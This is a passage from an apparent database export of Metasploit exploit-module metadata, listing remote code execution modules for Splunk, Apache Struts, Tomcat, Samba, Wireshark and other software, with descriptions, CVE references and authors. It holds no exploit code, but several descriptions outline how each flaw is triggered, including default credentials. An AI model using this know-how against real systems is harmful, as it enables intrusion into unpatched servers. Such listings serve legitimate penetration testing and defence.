00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/sit_file_upload.rb","exploit","multi/http/sit_file_upload","exploit/multi/http/sit_file_upload","Support Incident Tracker <= 3.65 Remote Command Execution",600,"This module combines two separate issues within Support Incident Tracker (<= 3.65) application to upload arbitrary data and thus execute a shell. The two issues exist in ftp_upload_file.php. The first vulnerability exposes the upload dir used to store attachments. The second vulnerability allows arbitrary file upload since there is no validation function to prevent from uploading any file type. 
Authentication is required to exploit both vulnerabilities.","Metasploit Framework License (BSD)","f","2011-11-10 00:00:00",0,,"aggressive","t","CVE-2011-3829, CVE-2011-3833, OSVDB-76999, OSVDB-77003, URL-http://secunia.com/secunia_research/2011-75/, URL-http://secunia.com/secunia_research/2011-79/","Secunia Research, juan vazquez " 161,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/snortreport_exec.rb","exploit","multi/http/snortreport_exec","exploit/multi/http/snortreport_exec","Snortreport nmap.php/nbtscan.php Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in nmap.php and nbtscan.php scripts.","Metasploit Framework License (BSD)","f","2011-09-19 00:00:00",0,,"aggressive","t","OSVDB-67739, URL-http://www.symmetrixtech.com/articles/news-016.html","Paul Rascagneres" 162,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/sonicwall_gms_upload.rb","exploit","multi/http/sonicwall_gms_upload","exploit/multi/http/sonicwall_gms_upload","SonicWALL GMS 6 Arbitrary File Upload",600,"This module exploits a code execution flaw in SonicWALL GMS. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the Web Administration interface allows to abuse the ""appliance"" application and upload an arbitrary payload embedded in a JSP. The module has been tested successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual Appliance (Linux). 
On the Virtual Appliance the linux meterpreter hasn't run successfully while testing, shell payload have been used.","Metasploit Framework License (BSD)","t","2012-01-17 00:00:00",0,,"aggressive","t","BID-57445, CVE-2013-1359, EDB-24204, OSVDB-89347","Julian Vilas , Nikolas Sotiriu, juan vazquez " 163,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/splunk_mappy_exec.rb","exploit","multi/http/splunk_mappy_exec","exploit/multi/http/splunk_mappy_exec","Splunk Search Remote Code Execution",600,"This module abuses a command execution vulnerability in the web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the 'mappy' search command which allows attackers to run Python code. To exploit this vulnerability, a valid Splunk user with the admin role is required. By default, this module uses the credential of ""admin:changeme"", the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.","Metasploit Framework License (BSD)","f","2011-12-12 00:00:00",0,,"aggressive","t","BID-51061, CVE-2011-4642, OSVDB-77695, URL-http://www.sec-1.com/blog/?p=233, URL-http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf, URL-http://www.sec-1.com/blog/wp-content/uploads/2011/12/splunkexploit.zip, URL-http://www.splunk.com/view/SP-CAAAGMM","Gary O'Leary-Steele, juan vazquez " 164,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/splunk_upload_app_exec.rb","exploit","multi/http/splunk_upload_app_exec","exploit/multi/http/splunk_upload_app_exec","Splunk 5.0 Custom App Remote Code Execution",400,"This module exploits a feature of Splunk whereby a custom application can be uploaded through the web based interface. Through the 'script' search command a user can call commands defined in their custom application which includes arbitrary perl or python code. 
To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of ""admin:changeme"", the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. This module has only been tested successfully against Splunk 5.0.","Metasploit Framework License (BSD)","f","2012-09-27 00:00:00",,,"aggressive","t","URL-http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html, URL-http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html, URL-http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script","juan vazquez , marcwickenden, sinn3r " 165,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/spree_search_exec.rb","exploit","multi/http/spree_search_exec","exploit/multi/http/spree_search_exec","Spreecommerce 0.60.1 Arbitrary Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the Spreecommerce search. Unvalidated input is called via the Ruby send method allowing command execution.","Metasploit Framework License (BSD)","f","2011-10-05 00:00:00",0,,"aggressive","t","OSVDB-76011, URL-http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/","joernchen " 166,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/spree_searchlogic_exec.rb","exploit","multi/http/spree_searchlogic_exec","exploit/multi/http/spree_searchlogic_exec","Spreecommerce < 0.50.0 Arbitrary Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the Spreecommerce API searchlogic. 
Unvalidated input is called via the Ruby send method allowing command execution.","Metasploit Framework License (BSD)","f","2011-04-19 00:00:00",0,,"aggressive","t","OSVDB-71900, URL-http://www.spreecommerce.com/blog/2011/04/19/security-fixes/","joernchen " 167,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/struts_code_exec.rb","exploit","multi/http/struts_code_exec","exploit/multi/http/struts_code_exec","Apache Struts < 2.2.0 Remote Command Execution",400,"This module exploits a remote command execution vulnerability in Apache Struts versions < 2.2.0. This issue is caused by a failure to properly handle unicode characters in OGNL extensive expressions passed to the web server. By sending a specially crafted request to the Struts application it is possible to bypass the ""#"" restriction on ParameterInterceptors by using OGNL context variables. Bypassing this restriction allows for the execution of arbitrary Java code.","Metasploit Framework License (BSD)","t","2010-07-13 00:00:00",0,,"aggressive","t","CVE-2010-1870, EDB-14360, OSVDB-66280","Meder Kydyraliev, bannedit " 168,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb","exploit","multi/http/struts_code_exec_exception_delegator","exploit/multi/http/struts_code_exec_exception_delegator","Apache Struts <= 2.2.1.1 Remote Command Execution",600,"This module exploits a remote command execution vulnerability in Apache Struts versions < 2.2.1.1. 
This issue is caused because the ExceptionDelegator interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.","Metasploit Framework License (BSD)","t","2012-01-06 00:00:00",2,,"aggressive","t","CVE-2012-0391, EDB-18329, OSVDB-78277, URL-https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt","Andreas Nusser, Johannes Dahse, juan vazquez , mihi, sinn3r " 169,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/struts_code_exec_parameters.rb","exploit","multi/http/struts_code_exec_parameters","exploit/multi/http/struts_code_exec_parameters","Apache Struts ParametersInterceptor Remote Code Execution",600,"This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows for the use of parentheses which in turn allows it to interpret parameter values as OGNL expressions during certain exception handling for mismatched data types of properties which allows remote attackers to execute arbitrary Java code via a crafted parameter.","Metasploit Framework License (BSD)","t","2011-10-01 00:00:00",2,,"aggressive","t","CVE-2011-3923, OSVDB-78501, URL-http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html, URL-https://cwiki.apache.org/confluence/display/WW/S2-009","Meder Kydyraliev, Richard Hicks , mihi" 170,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/stunshell_eval.rb","exploit","multi/http/stunshell_eval","exploit/multi/http/stunshell_eval","STUNSHELL Web Shell Remote PHP Code Execution",500,"This module exploits unauthenticated versions of the ""STUNSHELL"" web shell. This module works when safe mode is enabled on the web server. 
This shell is widely used in automated RFI payloads.","Metasploit Framework License (BSD)","f","2013-03-23 00:00:00",0,,"aggressive","t","URL-https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007, URL-https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL","bwall " 171,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/stunshell_exec.rb","exploit","multi/http/stunshell_exec","exploit/multi/http/stunshell_exec","STUNSHELL Web Shell Remote Code Execution",500,"This module exploits unauthenticated versions of the ""STUNSHELL"" web shell. This module works when safe mode is disabled on the web server. This shell is widely used in automated RFI payloads.","Metasploit Framework License (BSD)","f","2013-03-23 00:00:00",0,,"aggressive","t","URL-https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007, URL-https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL","bwall " 172,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/sun_jsws_dav_options.rb","exploit","multi/http/sun_jsws_dav_options","exploit/multi/http/sun_jsws_dav_options","Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",500,"This module exploits a buffer overflow in Sun Java Web Server prior to version 7 Update 8. By sending an ""OPTIONS"" request with an overly long path, attackers can execute arbitrary code. In order to reach the vulnerable code, the attacker must also specify the path to a directory with WebDAV enabled. This exploit was tested and confirmed to work on Windows XP SP3 without DEP. Versions for other platforms are vulnerable as well. 
The vulnerability was originally discovered and disclosed by Evgeny Legerov of Intevydis.","Metasploit Framework License (BSD)","t","2010-01-20 00:00:00",0,,"aggressive","t","CVE-2010-0361, OSVDB-61851, URL-http://intevydis.blogspot.com/2010/01/sun-java-system-web-server-70u7-webdav.html, URL-http://sunsolve.sun.com/search/document.do?assetkey=1-66-275850-1","jduck " 173,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/testlink_upload_exec.rb","exploit","multi/http/testlink_upload_exec","exploit/multi/http/testlink_upload_exec","TestLink v1.9.3 Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability in TestLink version 1.9.3 or prior. This application has an upload feature that allows any authenticated user to upload arbitrary files to the '/upload_area/nodes_hierarchy/' directory with a randomized file name. The file name can be retrieved from the database using SQL injection.","Metasploit Framework License (BSD)","f","2012-08-13 00:00:00",0,,"aggressive","t","URL-http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/","Brendan Coles " 174,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/tomcat_mgr_deploy.rb","exploit","multi/http/tomcat_mgr_deploy","exploit/multi/http/tomcat_mgr_deploy","Apache Tomcat Manager Application Deployer Authenticated Code Execution",600,"This module can be used to execute a payload on Apache Tomcat servers that have an exposed ""manager"" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. 
For example, you must select the Windows target to use native Windows payloads.","Metasploit Framework License (BSD)","f","2009-11-09 00:00:00",0,,"aggressive","t","BID-36954, BID-38084, CVE-2009-3548, CVE-2009-3843, CVE-2009-4188, CVE-2009-4189, CVE-2010-0557, CVE-2010-4094, OSVDB-60176, OSVDB-60317, OSVDB-60670, URL-http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-214/","jduck " 175,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/traq_plugin_exec.rb","exploit","multi/http/traq_plugin_exec","exploit/multi/http/traq_plugin_exec","Traq admincp/common.php Remote Code Execution",600,"This module exploits an arbitrary command execution vulnerability in Traq 2.0 to 2.3. It's in the admincp/common.php script. This function is called in each script located into /admicp/ directory to make sure the user has admin rights, but this is a broken authorization schema due to the header() function doesn't stop the execution flow. This can be exploited by malicious users to execute admin functionality resulting for e.g. in execution of arbitrary PHP code leveraging of plugins.php functionality.","Metasploit Framework License (BSD)","f","2011-12-12 00:00:00",0,,"aggressive","t","EDB-18213, OSVDB-77556, URL-http://traqproject.org/","EgiX, TecR0c " 176,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/v0pcr3w_exec.rb","exploit","multi/http/v0pcr3w_exec","exploit/multi/http/v0pcr3w_exec","v0pCr3w Web Shell Remote Code Execution",500,"This module exploits a lack of authentication in the shell developed by v0pCr3w and is widely reused in automated RFI payloads. 
This module takes advantage of the shell's various methods to execute commands.","Metasploit Framework License (BSD)","f","2013-03-23 00:00:00",0,,"aggressive","t","URL-https://defense.ballastsecurity.net/decoding/index.php?hash=f6b534edf37c3cc0aa88997810daf9c0, URL-https://defense.ballastsecurity.net/wiki/index.php/V0pCr3w_shell","bwall " 177,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/vbseo_proc_deutf.rb","exploit","multi/http/vbseo_proc_deutf","exploit/multi/http/vbseo_proc_deutf","vBSEO <= 3.6.0 proc_deutf() Remote PHP Code Injection",600,"This module exploits a vulnerability in the 'proc_deutf()' function defined in /includes/functions_vbseocp_abstract.php. User input passed through 'char_repl' POST parameter isn't properly sanitized before being used in a call to preg_replace() function which uses the 'e' modifier. This can be exploited to inject and execute arbitrary code leveraging the PHP's complex curly syntax.","Metasploit Framework License (BSD)","f","2012-01-23 00:00:00",0,,"aggressive","t","BID-51647, EDB-18424, OSVDB-78508, URL-http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/","EgiX " 178,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/webpagetest_upload_exec.rb","exploit","multi/http/webpagetest_upload_exec","exploit/multi/http/webpagetest_upload_exec","WebPageTest Arbitrary PHP File Upload",600,"This module exploits a vulnerability found in WebPageTest's Upload Feature. By default, the resultimage.php file does not verify the user-supplied item before saving it to disk, and then places this item in the web directory accessible by remote users. 
This flaw can be abused to gain remote code execution.","Metasploit Framework License (BSD)","f","2012-07-13 00:00:00",0,,"aggressive","t","EDB-19790, OSVDB-83822","dun, sinn3r " 179,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/wikka_spam_exec.rb","exploit","multi/http/wikka_spam_exec","exploit/multi/http/wikka_spam_exec","WikkaWiki 1.3.2 Spam Logging PHP Injection",600,"This module exploits a vulnerability found in WikkaWiki. When the spam logging feature is enabled, it is possible to inject PHP code into the spam log file via the UserAgent header , and then request it to execute our payload. There are at least three different ways to trigger spam protection, this module does so by generating 10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6). Please note that in order to use the injection, you must manually pick a page first that allows you to add a comment, and then set it as 'PAGE'.","Metasploit Framework License (BSD)","f","2011-11-30 00:00:00",0,,"aggressive","t","CVE-2011-4451, EDB-18177, OSVDB-77393, URL-http://wush.net/trac/wikka/ticket/1098","EgiX, sinn3r " 180,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/zenworks_control_center_upload.rb","exploit","multi/http/zenworks_control_center_upload","exploit/multi/http/zenworks_control_center_upload","Novell ZENworks Configuration Management Remote Execution",500,"This module exploits a code execution flaw in Novell ZENworks Configuration Management 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control Center application, allowing an unauthenticated attacker to upload a malicious file outside of the TEMP directory and then make a second request that allows for arbitrary code execution. 
This module has been tested successfully on Novell ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE Linux Enterprise Server 10 SP3.","Metasploit Framework License (BSD)","f","2013-03-22 00:00:00",1,,"aggressive","t","BID-58668, CVE-2013-1080, OSVDB-91627, URL-http://www.novell.com/support/kb/doc.php?id=7011812, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-049/","James Burton, juan vazquez " 181,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/ids/snort_dce_rpc.rb","exploit","multi/ids/snort_dce_rpc","exploit/multi/ids/snort_dce_rpc","Snort 2 DCE/RPC preprocessor Buffer Overflow",400,"This module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. 
The remote host does not need to be running the SMB service for the exploit to be successful.","Metasploit Framework License (BSD)","t","2007-02-19 00:00:00",0,,"aggressive","t","CVE-2006-5276, OSVDB-32094, URL-http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py, URL-http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html, URL-http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html","0a29406d9794e4f9b30b3c5d6702c708, Carsten Maartmann-Moe , Neel Mehta, Trirat Puttaraksa" 182,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/batik_svg_java.rb","exploit","multi/misc/batik_svg_java","exploit/multi/misc/batik_svg_java","Squiggle 1.7 SVG Browser Java Code Execution",600,"This module abuses the SVG support to execute Java Code in the Squiggle Browser included in the Batik framework 1.7 through a crafted SVG file referencing a jar file. In order to gain arbitrary code execution, the browser must meet the following conditions: (1) It must support at least SVG version 1.1 or newer, (2) It must support Java code and (3) The ""Enforce secure scripting"" check must be disabled. The module has been tested against Windows and Linux platforms.","Metasploit Framework License (BSD)","f","2012-05-11 00:00:00",0,,"passive","t","OSVDB-81965, URL-http://www.agarri.fr/blog/","Nicolas Gregoire, juan vazquez , sinn3r " 183,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/hp_vsa_exec.rb","exploit","multi/misc/hp_vsa_exec","exploit/multi/misc/hp_vsa_exec","HP StorageWorks P4000 Virtual SAN Appliance Command Execution",600,"This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on versions prior to 9.5. 
By using a default account credential, it is possible to inject arbitrary commands as part of a ping request via port 13838.","Metasploit Framework License (BSD)","t","2011-11-11 00:00:00",0,,"aggressive","t","EDB-18893, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086, URL-http://www.agarri.fr/blog/archives/2012/02/index.html, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958","Nicolas Gregoire, sinn3r " 184,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/indesign_server_soap.rb","exploit","multi/misc/indesign_server_soap","exploit/multi/misc/indesign_server_soap","Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution",600,"This module abuses the ""RunScript"" procedure provided by the SOAP interface of Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX). The exploit drops the payload on the server and must be removed manually.","Metasploit Framework License (BSD)","f","2012-11-11 00:00:00",0,,"aggressive","t","OSVDB-87548, URL-http://secunia.com/advisories/48572/","h0ng10, juan vazquez " 185,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/java_rmi_server.rb","exploit","multi/misc/java_rmi_server","exploit/multi/misc/java_rmi_server","Java RMI Server Insecure Default Configuration Java Code Execution",600,"This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. 
Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.","Metasploit Framework License (BSD)","t","2011-10-15 00:00:00",0,,"aggressive","t","MSF-java_rmi_server, URL-http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html","mihi" 186,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/openview_omniback_exec.rb","exploit","multi/misc/openview_omniback_exec","exploit/multi/misc/openview_omniback_exec","HP OpenView OmniBack II Command Execution",600,"This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the ""unix/cmd/generic"" payload and set CMD to your command. You can only pass a small amount of characters (4) to the command line on Windows.","Metasploit Framework License (BSD)","f","2001-02-28 00:00:00",0,,"aggressive","t","BID-11032, CVE-2001-0311, OSVDB-6018, URL-http://www.securiteam.com/exploits/6M00O150KG.html","hdm , patrick " 187,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/pbot_exec.rb","exploit","multi/misc/pbot_exec","exploit/multi/misc/pbot_exec","PHP IRC Bot pbot eval() Remote Code Execution",600,"This module allows remote command execution on the PHP IRC bot pbot by abusing the usage of eval() in the implementation of the .php command. In order to work, the data to connect to the IRC server and channel where find pbot must be provided. 
The module has been successfully tested on the version of pbot analyzed by Jay Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP SP3.","Metasploit Framework License (BSD)","f","2009-11-02 00:00:00",0,,"aggressive","t","EDB-20168, URL-http://offensivecomputing.net/?q=node/1417, URL-http://resources.infosecinstitute.com/pbot-analysis/","Jay Turla, bwall, evilcry, juan vazquez " 188,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb","exploit","multi/misc/ra1nx_pubcall_exec","exploit/multi/misc/ra1nx_pubcall_exec","Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution",500,"This module allows remote command execution on the PHP IRC bot Ra1NX by using the public call feature in private message to covertly bypass the authentication system.","Metasploit Framework License (BSD)","f","2013-03-24 00:00:00",0,,"aggressive","t","OSVDB-91663, URL-http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b, URL-https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0, URL-https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot","bwall " 189,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb","exploit","multi/misc/veritas_netbackup_cmdexec","exploit/multi/misc/veritas_netbackup_cmdexec","VERITAS NetBackup Remote Command Execution",600,"This module allows arbitrary command execution on an ephemeral port opened by Veritas NetBackup, whilst an administrator is authenticated. 
The port is opened and allows direct console access as root or SYSTEM from any source address.","Metasploit Framework License (BSD)","t","2004-10-21 00:00:00",0,,"aggressive","t","BID-11494, CVE-2004-1389, OSVDB-11026, URL-http://seer.support.veritas.com/docs/271727.htm","patrick " 190,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb","exploit","multi/misc/wireshark_lwres_getaddrbyname","exploit/multi/misc/wireshark_lwres_getaddrbyname","Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow",500,"The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. 
If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.","Metasploit Framework License (BSD)","t","2010-01-27 00:00:00",,,"aggressive","t","BID-37985, CVE-2010-0304, OSVDB-61987, URL-http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h, URL-http://www.wireshark.org/security/wnpa-sec-2010-02.html","babi, jduck , redsand" 191,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb","exploit","multi/misc/wireshark_lwres_getaddrbyname_loop","exploit/multi/misc/wireshark_lwres_getaddrbyname_loop","Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)",500,"The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue. 
This version loops, sending the packet every X seconds until the job is killed.","Metasploit Framework License (BSD)","t","2010-01-27 00:00:00",4,,"passive","t","BID-37985, CVE-2010-0304, OSVDB-61987, URL-http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h, URL-http://www.wireshark.org/security/wnpa-sec-2010-02.html","babi, jduck , redsand" 192,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/zend_java_bridge.rb","exploit","multi/misc/zend_java_bridge","exploit/multi/misc/zend_java_bridge","Zend Server Java Bridge Arbitrary Java Code Execution",500,"This module takes advantage of a trust relationship issue within the Zend Server Java Bridge. The Java Bridge is responsible for handling interactions between PHP and Java code within Zend Server. When Java code is encountered Zend Server communicates with the Java Bridge. The Java Bridge then handles the java code and creates the objects within the Java Virtual Machine. This interaction however, does not require any sort of authentication. This leaves the JVM wide open to remote attackers. Sending specially crafted data to the Java Bridge results in the execution of arbitrary java code.","Metasploit Framework License (BSD)","t","2011-03-28 00:00:00",0,,"passive","t","EDB-17078, OSVDB-71420, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-113/","bannedit " 193,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/ntp/ntp_overflow.rb","exploit","multi/ntp/ntp_overflow","exploit/multi/ntp/ntp_overflow","NTP daemon readvar Buffer Overflow",400,"This module exploits a stack based buffer overflow in the ntpd and xntpd service. By sending an overly long 'readvar' request it is possible to execute code remotely. 
As the stack is corrupted, this module uses the Egghunter technique.","Metasploit Framework License (BSD)","t","2001-04-04 00:00:00",0,,"aggressive","t","BID-2540, CVE-2001-0414, OSVDB-805, US-CERT-VU-970472","patrick " 194,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/php/php_unserialize_zval_cookie.rb","exploit","multi/php/php_unserialize_zval_cookie","exploit/multi/php/php_unserialize_zval_cookie","PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",200,"This module exploits an integer overflow vulnerability in the unserialize() function of the PHP web server extension. This vulnerability was patched by Stefan in version 4.5.0 and applies to all previous versions supporting this function. This particular module targets numerous web applications and is based on the proof of concept provided by Stefan Esser. This vulnerability requires approximately 900k of data to trigger due to the multiple Cookie headers requirement. Since we are already assuming a fast network connection, we use a 2Mb block of shellcode for the brute force, allowing quick exploitation for those with fast networks. One of the neat things about this vulnerability is that on x86 systems, the EDI register points into the beginning of the hashtable string. This can be used with an egghunter to quickly exploit systems where the location of a valid ""jmp EDI"" or ""call EDI"" instruction is known. 
The EDI method is faster, but the bandwidth-intensive brute force used by this module is more reliable across a wider range of systems.","Metasploit Framework License (BSD)","f","2007-03-04 00:00:00",,,"aggressive","t","CVE-2007-1286, OSVDB-32771, URL-http://www.php-security.org/MOPB/MOPB-04-2007.html","GML , Stefan Esser , hdm " 195,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/realserver/describe.rb","exploit","multi/realserver/describe","exploit/multi/realserver/describe","RealServer Describe Buffer Overflow",500,"This module exploits a buffer overflow in RealServer 7/8/9 and was based on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit Linux, BSD, and Windows-based servers.","Metasploit Framework License (BSD)","t","2002-12-20 00:00:00",0,,"aggressive","t","CVE-2002-1643, OSVDB-4468, URL-http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html","hdm " 196,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/samba/nttrans.rb","exploit","multi/samba/nttrans","exploit/multi/samba/nttrans","Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow",200,"This module attempts to exploit a buffer overflow vulnerability present in versions 2.2.2 through 2.2.6 of Samba. 
The Samba developers report this as: ""Bug in the length checking for encrypted password change requests from clients."" The bug was discovered and reported by the Debian Samba Maintainers.","Metasploit Framework License (BSD)","t","2003-04-07 00:00:00",,,"aggressive","t","BID-6210, CVE-2002-1318, OSVDB-14525, URL-http://www.samba.org/samba/history/samba-2.2.7a.html","hdm " 197,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/samba/usermap_script.rb","exploit","multi/samba/usermap_script","exploit/multi/samba/usermap_script","Samba ""username map script"" Command Execution",600,"This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default ""username map script"" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!","Metasploit Framework License (BSD)","t","2007-05-14 00:00:00",0,,"aggressive","t","BID-23972, CVE-2007-2447, OSVDB-34700, 